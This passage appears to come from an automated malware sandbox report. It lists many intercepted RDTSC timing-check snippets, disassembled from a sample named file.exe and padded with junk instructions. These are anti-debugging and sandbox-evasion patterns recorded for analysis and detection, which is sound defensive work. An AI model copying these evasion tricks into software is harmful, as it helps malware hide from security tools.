Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EC63 second address: 62EC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000004h 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F6C544CAC28h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or cx, 2A0Ah 0x0000002a nop 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EC96 second address: 62ECA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6859B4 second address: 6859B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6859B8 second address: 6859C2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6C54B58546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6859C2 second address: 6859C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6859C8 second address: 6859D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68BF51 second address: 68BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68BF55 second address: 68BF70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6C54B58555h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C0D6 second address: 68C0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC34h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CA82 second address: 68CA8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6955AE second address: 6955C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F6C544CAC36h 0x0000000b jmp 00007F6C544CAC2Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6955C5 second address: 6955D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6C54B58548h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F6C54B58546h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6959CC second address: 6959D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6959D8 second address: 6959F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695B43 second address: 695B48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695FB0 second address: 695FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695FC8 second address: 695FE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6C544CAC35h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0B53 second address: 6A0B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6C54B58546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0B5F second address: 6A0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69EC79 second address: 69EC7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69EDC2 second address: 69EDD9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C544CAC26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jnc 00007F6C544CAC26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69EDD9 second address: 69EDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F16B second address: 69F18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC38h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F18C second address: 69F192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F192 second address: 69F198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F311 second address: 69F332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C54B58556h 0x00000008 jnp 00007F6C54B58546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F332 second address: 69F341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F6C544CAC26h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F495 second address: 69F499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F499 second address: 69F49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F49D second address: 69F4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F4A3 second address: 69F4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F619 second address: 69F636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6C54B58556h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F636 second address: 69F650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F6C544CAC26h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F650 second address: 69F65A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C54B58546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F65A second address: 69F663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F7CA second address: 69F80E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6C54B5856Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F80E second address: 69F839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC32h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6C544CAC32h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69FACB second address: 69FAD6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69FAD6 second address: 69FADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A318F second address: 6A3195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A3195 second address: 6A31AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F6C544CAC33h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7B76 second address: 6A7B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7B7C second address: 6A7B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7B80 second address: 6A7B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A78F5 second address: 6A7909 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6C544CAC32h 0x0000000c jl 00007F6C544CAC26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B88DD second address: 6B88E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B88E6 second address: 6B8923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C544CAC36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F6C544CAC2Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6C544CAC31h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BDE68 second address: 6BDE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Eh 0x00000009 jbe 00007F6C54B58546h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BDE81 second address: 6BDE95 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F6C544CAC26h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8D51 second address: 6C8D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B58554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D0107 second address: 6D010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CEFD4 second address: 6CEFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF109 second address: 6CF10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF24A second address: 6CF250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF250 second address: 6CF256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CFDCE second address: 6CFDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CFDD2 second address: 6CFE40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F6C544CAC2Ah 0x0000000f jnl 00007F6C544CAC2Eh 0x00000015 popad 0x00000016 pushad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F6C544CAC38h 0x0000001f pop ecx 0x00000020 je 00007F6C544CAC33h 0x00000026 pushad 0x00000027 je 00007F6C544CAC26h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D570D second address: 6D5725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58553h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D5725 second address: 6D572D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D572D second address: 6D5733 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D5733 second address: 6D5742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D5742 second address: 6D5746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D5746 second address: 6D5771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6C544CAC2Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C544CAC35h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7703 second address: 6D7718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7718 second address: 6D771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D771E second address: 6D7733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F6C54B5856Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jng 00007F6C54B58546h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7733 second address: 6D7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7737 second address: 6D7743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7743 second address: 6D7747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7747 second address: 6D774B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D73F0 second address: 6D73FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D73FC second address: 6D7400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7400 second address: 6D740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F6C544CAC28h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D740E second address: 6D743D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F6C54B5854Eh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C54B58559h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DB702 second address: 6DB708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DB708 second address: 6DB730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58552h 0x00000007 jmp 00007F6C54B5854Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DCCCE second address: 6DCCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E2163 second address: 6E21AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 jnc 00007F6C54B5857Ch 0x0000001a jmp 00007F6C54B58556h 0x0000001f jnc 00007F6C54B58560h 0x00000025 jmp 00007F6C54B58554h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2537 second address: 6F255B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007F6C544CAC26h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6C544CAC31h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F255B second address: 6F255F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F23DF second address: 6F23E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F5B81 second address: 6F5B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8680 second address: 6F8699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6C544CAC26h 0x0000000a popad 0x0000000b jnp 00007F6C544CAC2Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8699 second address: 6F86A5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C54B5854Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F84AE second address: 6F84B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F84B8 second address: 6F84BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F84BC second address: 6F84C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F84C4 second address: 6F84CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FE463 second address: 6FE46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD3AB second address: 6FD3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD3AF second address: 6FD3BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD4EA second address: 6FD51D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C54B58546h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F6C54B5854Ah 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6C54B58559h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD51D second address: 6FD538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC30h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD679 second address: 6FD69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Eh 0x00000009 jmp 00007F6C54B58554h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD69F second address: 6FD6A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C544CAC2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD6A9 second address: 6FD6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F6C54B58556h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD6CB second address: 6FD6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD803 second address: 6FD827 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6C54B58546h 0x00000008 jl 00007F6C54B58546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6C54B58554h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDD8E second address: 6FDD94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
